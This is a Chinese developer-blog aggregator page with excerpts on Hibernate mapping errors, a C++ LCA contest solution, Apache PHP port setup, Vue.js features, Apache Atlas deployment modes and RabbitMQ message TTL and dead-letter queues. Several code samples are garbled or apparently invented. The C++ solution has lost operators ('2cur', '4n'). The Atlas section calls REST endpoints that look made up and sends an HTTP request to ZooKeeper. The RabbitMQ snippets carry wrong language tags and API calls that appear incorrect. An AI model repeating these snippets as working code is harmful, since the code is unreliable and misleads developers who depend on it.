...体类。例如: php-template 如果我们使用的是Java配置文件,那么我们需要在@EntityScan注解中指定我们的实体类所在的包。例如: less @EntityScan("com.example") public class MyConfig { // ... } 2. 检查实体类定义 其次,我们需要检查我们的实体类定义是否存在错误。比如,咱们得保证咱们的实体类已经妥妥地标记上了@Entity这个小标签,而且,所有的属性都分配了正确的数据类型和相对应的注解,一个都不能少。此外,我们还需要确保我们的实体类实现了Serializable接口。 例如: java @Entity public class MyEntity implements Serializable { private Long id; private String name; // getters and setters } 3. 调整Hibernate缓存设置 最后,我们需要确保Hibernate的缓存已经正确地工作。如果我们的缓存没整对,Hibernate可能就抓不到我们想要的那个实体类了。我们可以通过调整Hibernate的缓存设置来解决这个问题。例如,我们可以禁用Hibernate的二级缓存,或者调整Hibernate的查询缓存策略。 例如: java Configuration cfg = new Configuration(); cfg.setProperty("hibernate.cache.use_second_level_cache", "false"); SessionFactory sessionFactory = cfg.buildSessionFactory(); 四、结论 总的来说,“org.hibernate.MappingException: Unknown entity”是一种常见的Hibernate错误,主要是由于我们的实体类定义存在问题或者是Hibernate的缓存设置不当导致的。根据以上提到的解决方法,咱们应该能顺顺利利地搞定这个问题,这样一来,咱就能更溜地用Hibernate来操作数据啦。同时,咱们也得留意到,Hibernate出错其实就像咱编程过程中的一个预警小喇叭,它在告诉我们:嗨,伙计们,你们的设计或者代码可能有需要打磨的地方啦!这正是我们深入检查代码、优化系统设计的好时机,这样一来,咱们的编程质量和效率才能更上一层楼。
2023-10-12 18:35:41
463
红尘漫步-t
转载文章
...owproblem.php?pid=6203 给出q条链 由u和v确定 每条链上至少有一个节点是有故障的 问整个树图中至少有多少故障节点 对于每条链 求出lca 再按lca的深度降序排序 然后对于一条链 如果uv节点都没有被其他链覆盖过 那就将lca对应的整棵子树标记覆盖 答案加加 否则就说明当前这条链上的故障点已经可以和别的链合并了 可以忽略 至于为什么要按深度降序排序 我认为这样每次只需要判断一条链是不是已经通过其他链确定 如果升序排序 每一次要看lca到u和v这条链上有多少其它链上的lca被影响 很难写 (借鉴)同时 由于优先处理 LCA 深度大的点 不会出现点 U V 同时在同一个被禁止通行点 P 的子树内 include <cstdio>include <cmath>include <cstring>include <algorithm>using namespace std;struct node0{int u;int v;int lca;};struct node1{int v;int next;};node0 pre[50010];node1 edge[60010];int dp[30010][15];int val[120010];int first[30010],deep[30010],mp[30010],sum[30010];int n,q,num;bool cmp(node0 n1,node0 n2){return deep[n1.lca]>deep[n2.lca];}void addedge(int u,int v){edge[num].v=v;edge[num].next=first[u];first[u]=num++;}void dfs(int cur,int fa){int i,v;mp[cur]=++num,sum[cur]=1;for(i=first[cur];i!=-1;i=edge[i].next){v=edge[i].v;if(v!=fa){dp[v][0]=cur;deep[v]=deep[cur]+1;dfs(v,cur);sum[cur]+=sum[v];} }return;}void solve(){int i,j;dp[1][0]=0;deep[1]=1;num=0;dfs(1,0);for(j=1;(1<<j)<=n;j++){for(i=1;i<=n;i++){dp[i][j]=dp[dp[i][j-1]][j-1];} }return;}int getlca(int u,int v){int i;if(deep[u]<deep[v]) swap(u,v);for(i=log2(n);i>=0;i--){if(deep[dp[u][i]]>=deep[v]){u=dp[u][i];} }if(u==v) return u;for(i=log2(n);i>=0;i--){if(dp[u][i]!=dp[v][i]){u=dp[u][i];v=dp[v][i];} }return dp[u][0];}void query(int tar,int &res,int l,int r,int cur){int m;res|=val[cur];if(l==r) return;m=(l+r)/2;if(tar<=m) query(tar,res,l,m,2cur);else query(tar,res,m+1,r,2cur+1);}void update(int pl,int pr,int l,int r,int cur){int m;if(pl<=l&&r<=pr){val[cur]=1;return;}m=(l+r)/2;if(pl<=m) update(pl,pr,l,m,2cur);if(pr>m) update(pl,pr,m+1,r,2cur+1);}int main(){int i,u,v,resu,resv,ans;while(scanf("%d",&n)!=EOF){n++;memset(first,-1,sizeof(first));num=0;for(i=1;i<=n-1;i++){scanf("%d%d",&u,&v);u++,v++;addedge(u,v);addedge(v,u);}solve();scanf("%d",&q);for(i=1;i<=q;i++){scanf("%d%d",&pre[i].u,&pre[i].v);pre[i].u++,pre[i].v++;pre[i].lca=getlca(pre[i].u,pre[i].v);}sort(pre+1,pre+q+1,cmp);for(i=1;i<=4n;i++) val[i]=0;ans=0;for(i=1;i<=q;i++){resu=0,resv=0;query(mp[pre[i].u],resu,1,n,1);query(mp[pre[i].v],resv,1,n,1);if(!resu&&!resv){update(mp[pre[i].lca],mp[pre[i].lca]+sum[pre[i].lca]-1,1,n,1);ans++;} }printf("%d\n",ans);}return 0;} 本篇文章为转载内容。原文链接:https://blog.csdn.net/sunyutian1998/article/details/82155271。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-08-26 17:12:34
82
转载
Linux
多个项目公用php的一个端口还是一个项目使用一个php端口:Linux环境下的技术探讨 在Linux系统中,我们常常面临这样的选择:多个Web项目是否应该共享同一个PHP监听的端口,还是每个项目单独分配一个端口。这个问题呀,其实跟咱们平时用电脑似的,牵扯到不少东西。就好比说,得琢磨怎么让服务器这个“大主机”更高效地分配和使用资源,有点像整理房间,把有限的空间利用到极致;再者呢,就是保证各个项目之间互不干扰,就像每本书都有自己专属的书架,这就是所谓的“项目隔离性”;最后,还希望管理起来轻松便捷,别搞得像解谜游戏似的,让人摸不着头脑。所以呀,归根结底,咱就是要解决服务器资源优化、项目独立运作以及管理简便化这几个关键问题。让我们一起深入探讨并结合实例来解析这一问题。 1. 单一端口多项目共用 首先,我们来看看多个Web项目通过单一PHP端口(通常为80或443)运行的情况: bash 使用Apache作为Web服务器,配置虚拟主机在同一端口上服务多个项目 ServerName project1.example.com DocumentRoot /var/www/project1/public_html ServerName project2.example.com DocumentRoot /var/www/project2/public_html 在这种模式下,不同的项目可以通过不同的域名或者子域名进行区分和访问,Apache/Nginx等Web服务器通过虚拟主机设置将请求路由到相应的项目目录。这样做的好处是,节省了系统资源,特别是对于端口资源有限的情况。同时,统一的端口也简化了防火墙规则和SSL证书的配置。 然而,这种方式存在一定的风险,如若某项目出现安全问题,可能会对同一端口上的其他项目产生影响。此外,如果不同项目的并发处理需求差异较大,可能导致资源调度不均衡。 2. 每个项目独立端口 再来看一下每个Web项目各自使用独立PHP端口的情况: bash 同样以Apache为例,但为每个项目分配独立端口 Listen 8080 ServerName project1.example.com DocumentRoot /var/www/project1/public_html Listen 8081 ServerName project2.example.com DocumentRoot /var/www/project2/public_html 每个项目都有自己的监听端口,这样可以更好地实现项目之间的隔离,提高安全性。而且,对于那些对并发处理能力或者性能要求贼高的项目,咱们完全可以根据实际情况,灵活地给各个项目独立分配资源,想怎么调就怎么调。 不过,这样做会消耗更多的端口资源,并且可能增加管理和维护的复杂度,例如需要额外配置NAT转换或防火墙规则,同时也可能使SSL证书配置变得繁琐。 3. 思考与权衡 在这场讨论中,没有绝对的“正确”答案,更多的是根据实际情况权衡利弊。如果你追求的是资源利用的最大化,希望运维管理能够轻松简单,那么选择共享端口绝对是个靠谱的方案。当你特别看重项目的自主权和安全性,或者有那种“各扫门前雪”,需要明确隔离开不同项目性能的情况时,给每个项目单独分配一个端口就显得超级合理,跟给每个人一间独立办公室一样,互不影响,各得其所。 总结来说,在Linux环境下,如何配置PHP端口服务于多个Web项目,关键在于理解你的业务需求、资源限制以及安全管理策略。在这个过程里,咱们得不断摸爬滚打、尝试各种可能,有时也得鼓起勇气做出一些妥协,就像找寻那个专属于自己的、恰到好处的平衡支点一样。
2023-02-11 22:29:42
173
晚秋落叶_
VUE
...的代码示例: php-template { { item.name } } 在这个例子中,我们使用了动态参数来传递item对象的id属性,然后在动态路由页面中通过$route.params获取到这个id属性,从而动态加载对应的内容。 三、数据持久化 在很多情况下,我们需要保存用户的操作历史或者是登录状态等等。这时,我们就需要用到数据持久化功能。而在Vue.js中,我们可以利用localStorage来实现这个功能。 下面是一个简单的代码示例: javascript export default { created() { this.loadFromLocalStorage(); }, methods: { saveToLocalStorage(key, value) { localStorage.setItem(key, JSON.stringify(value)); }, loadFromLocalStorage() { const data = localStorage.getItem(this.key); if (data) { this.data = JSON.parse(data); } } } } 在这个例子中,我们在created钩子函数中调用了loadFromLocalStorage方法,从localStorage中读取数据并赋值给data。接着,在saveToLocalStorage这个小妙招里,我们把data这位小伙伴变了个魔术,给它变成JSON格式的字符串,然后轻轻松松地塞进了localStorage的大仓库里。 四、文件上传 在很多应用中,我们都需要让用户上传文件,例如图片、视频等等。而在Vue.js中,我们可以利用FileReader API来实现这个功能。 下面是一个简单的代码示例: php-template 在这个例子中,我们使用了multiple属性来允许用户一次选择多个文件。然后在handleFiles方法中,我们遍历选定的文件数组,并利用FileReader API将文件内容读取出来。 以上就是我分享的一些尚未开发的Vue.js项目,希望大家能够从中找到自己的兴趣点,并且勇敢地尝试去做。相信只要你足够努力,你就一定能成为一名优秀的Vue.js开发者!
2023-04-20 20:52:25
380
梦幻星空_t
Apache Atlas
...,可以帮助企业有效地管理他们的数据资产。嘿,伙计们,这篇东西会手把手地带你们探索Apache Atlas的四种最常见的部署方式,每种模式我都会配上鲜活的实例代码展示。这样一来,你们就能更直观、更接地气地理解和掌握Apache Atlas的使用诀窍啦! 二、单机部署模式 单机部署模式是最简单的部署方式,适合小规模的企业或团队使用。在单机部署模式下,所有组件都在同一台机器上运行。 1. 部署步骤 下载并解压Apache Atlas的安装包; 修改配置文件(如:conf/atlas-env.sh); 启动所有服务(如:bin/start-all.sh); 浏览器访问http://localhost:21000进行初始化设置。 以下是使用Apache Atlas创建一个项目的基本代码示例: javascript // 创建项目 POST http://localhost:21000/api/v2/project { "name": "my_project", "description": "My first project with Apache Atlas" } 三、集群部署模式 集群部署模式适合中大型企业或团队使用,可以提高系统的可用性和性能。 1. 部署步骤 在多台机器上安装并启动Apache Atlas的所有服务; 使用Zookeeper进行服务注册和发现; 使用Apache Atlas API进行项目管理和其他操作。 以下是使用Apache Atlas在集群中创建一个项目的代码示例: php-template // 获取Zookeeper集群的地址 GET http://localhost:2181/_clusterinfo // 创建项目 POST http://localhost:21000/api/v2/project { "name": "my_project", "description": "My first project with Apache Atlas" } 四、混合部署模式 混合部署模式结合了单机和集群的优势,既可以提供较高的性能,又可以保证数据的安全性和可靠性。 1. 部署步骤 在单台机器上安装并启动Apache Atlas的服务,作为中央控制节点; 在多台机器上安装并启动Apache Atlas的服务,作为数据处理节点; 使用Zookeeper进行服务注册和发现; 使用Apache Atlas API进行项目管理和其他操作。 以下是使用Apache Atlas在混合部署中创建一个项目的代码示例: javascript // 创建中央控制节点 GET http://localhost:21000/api/v2/projects // 获取Zookeeper集群的地址 GET http://localhost:2181/_clusterinfo // 创建数据处理节点 POST http://localhost:21000/api/v2/nodes { "hostName": "data-node-1", "port": 21001, "role": "DATA_NODE" } // 创建项目 POST http://localhost:21000/api/v2/project { "name": "my_project", "description": "My first project with Apache Atlas" } 五、微服务部署模式 微服务部署模式是近年来越来越流行的一种部署方式,可以让企业更加灵活地应对业务的变化和需求的增长。 1. 部署步骤 将Apache Atlas分解为多个微服务,例如:项目管理、数据目录、元数据存储等; 使用Docker进行容器化部署; 使用Kubernetes进行服务编排和管理; 使用Apache Atlas API进行项目管理和其他操作。 以下是使用Apache Atlas在微服务部署中创建一个项目的代码示例: javascript // 安装并启动项目管理微服务 docker run -d --name atlas-project-management my-atlas-project-management-image // 安装并启动数据目录微服务 docker run -d --name atlas-data-directory my-atlas-data-directory-image // 安装并启动元数据存储微服务 docker run -d --name atlas-metadata-storage my-atlas-metadata-storage-image // 创建项目 POST http://localhost:21000/api/v2/project { "name": "my_project", "description": "My first project with Apache Atlas" } 总结 Apache Atlas有多种部署模式供用户选择,用户可以根据自己的需求和技术条件来选择最合适的部署方式。甭管您选择哪种部署方式,Apache Atlas都能像个小助手一样,帮助企业老铁们把数据资产打理得井井有条,妥妥地保护好这些宝贝资源。
2023-07-31 15:33:19
456
月下独酌-t
RabbitMQ
...头中添加属性 php-template 定义消息属性头 props = pika.BasicProperties(content_type='text/plain', delivery_mode=2, headers={'type': 'myapp'}, app_id='myapp', priority=9, timestamp=datetime.utcnow(), expiration=str(ttl / 1000)), 发布消息 channel.basic_publish(exchange='', routing_key='my_queue', body=message, properties=props) 在这个例子中,我们首先定义了一个BasicProperties对象,并设置了它的头部属性。然后,我们在发布消息的时候,将这个对象传递给了basic_publish方法。这样,我们就可以在消息发布的同时,设置消息的TTL属性了。 2. 通过API设置消息的TTL属性 python import pika connection = pika.BlockingConnection(pika.ConnectionParameters('localhost')) channel = connection.channel() 定义消息内容 message = "Hello World!" 设置消息的TTL属性 properties = pika.BasicProperties(expires=ttl) 发送消息 channel.basic_publish(exchange='', routing_key='my_queue', body=message, properties=properties) connection.close() 在这个例子中,我们首先建立了与RabbitMQ服务器的连接,并获取了一个频道。然后,我们定义了一条消息的内容,并设置了它的TTL属性。最后,我们将这条消息发送到了指定的队列。 四、TTL的作用 TTL是一个非常重要的功能,它可以帮助我们解决许多问题。下面是一些常见的应用场景: 1. 清理过期的数据 当我们有大量的数据需要存储的时候,如果没有合理的数据清理策略,数据量会越来越大,最终可能导致存储空间不足。通过调整TTL这个小家伙,我们就能像定时扫除过期杂物一样,定期清理掉那些无效的数据,确保咱们的数据始终保持新鲜有效,而且安全无虞。 2. 控制消息的生命周期 有时候,我们需要控制消息的生命周期,确保消息在特定的时间内被消费或者被删除。通过设置TTL,我们可以精确地控制消息的生命周期,满足各种需求。 3. 避免消息丢失 在某些情况下,由于网络故障或者其他原因,消息可能无法成功发送。这会儿,假如我们没给消息设定TTL(存活时间),那这条消息就会长期赖在队列里头,直到超时了才会被系统自动清理掉。这种情况会导致消息丢失,影响系统的正常运行。通过设置TTL,我们可以有效地防止这种情况的发生。 五、总结 总的来说,TTL是RabbitMQ的一个重要特性,它可以帮助我们更好地管理和维护消息中间件。了解并熟练掌握TTL的玩法,咱们就能在使用RabbitMQ时更加得心应手,这样一来,工作效率自然蹭蹭往上涨。
2023-12-09 11:05:57
94
林中小径-t
RabbitMQ
...发送。例如: php-template public function sendMessage($message, $maxRetries = 5) { for ($retryCount = 0; $retryCount < $maxRetries; $retryCount++) { try { $this->connection->publish($message); return; } catch (AMQPConnectionException $e) { if ($retryCount == $maxRetries - 1) { throw $e; } sleep(rand(1, 3)); // 随机等待一段时间再重试 } } } 3. 自定义死信队列 如果我们发现死信队列满的情况比较频繁,可以考虑自定义死信队列,定期清理死信队列。例如: css // 定义死信队列 $deadLetterQueue = new Queue('dead_letter_queue', false, false, true, false); // 创建DeadLetterExchange $deadLetterExchange = new DirectExchange('dlx'); $deadLetterExchange->setType(DirectExchange::TYPE_FANOUT); $deadLetterExchange->setArguments([ 'x-dead-letter-exchange' => 'amq.direct', 'x-dead-letter-routing-key' => 'dlx', ]); // 绑定死信队列到DeadLetterExchange $channel->bindQueue( $deadLetterQueue, $deadLetterExchange->getName(), $deadLetterQueue->getName() ); // 消费队列并处理死信 $consumer = new Consumer($channel, new Callback(function (MessageInterface $msg) { if (!$msg instanceof RecoverableExceptionMessageInterface) { return; } try { $msg->requeue(); // 将消息重新加入队列 } catch (\Throwable $e) { $msg->redeliver(); // 将消息再次发送给消费者 } })); $channel->consume($deadLetterQueue, '', false, false, false, $consumer); 4. 使用持久化存储 为了避免因网络问题导致消息丢失,我们可以选择使用持久化存储,这样即使在网络中断的情况下,消息也可以保存下来。例如: java Exchange exchange = ExchangeBuilder.direct("exchange").build(); Binding binding = BindingBuilder.bind(exchange).toQueue("queue"); channel.queueDeclare(queueName, true, false, true, null); // 设置持久化标志位 binding.bind(channel); channel.basicConsume(queueName, true, new DefaultConsumer(channel) { @Override public void handleDelivery(String consumerTag, Envelope envelope, AMQP.BasicProperties properties, byte[] body) throws IOException { String message = new String(body, StandardCharsets.UTF_8); System.out.println("Received: " + message); channel.basicAck(deliveryTag, false); // 发送确认信号给Producer } });
2023-07-19 16:46:45
86
草原牧歌-t
站内搜索
用于搜索本网站内部文章,支持栏目切换。
知识学习
实践的时候请根据实际情况谨慎操作。
随机学习一条linux命令:
journalctl
- 查看systemd日志信息。
推荐内容
推荐本栏目内的其它文章,看看还有哪些文章让你感兴趣。
2023-04-28
2023-08-09
2023-06-18
2023-04-14
2023-02-18
2023-04-17
2024-01-11
2023-10-03
2023-09-09
2023-06-13
2023-08-07
2023-03-11
历史内容
快速导航到对应月份的历史文章列表。
随便看看
拉到页底了吧,随便看看还有哪些文章你可能感兴趣。
时光飞逝
"流光容易把人抛,红了樱桃,绿了芭蕉。"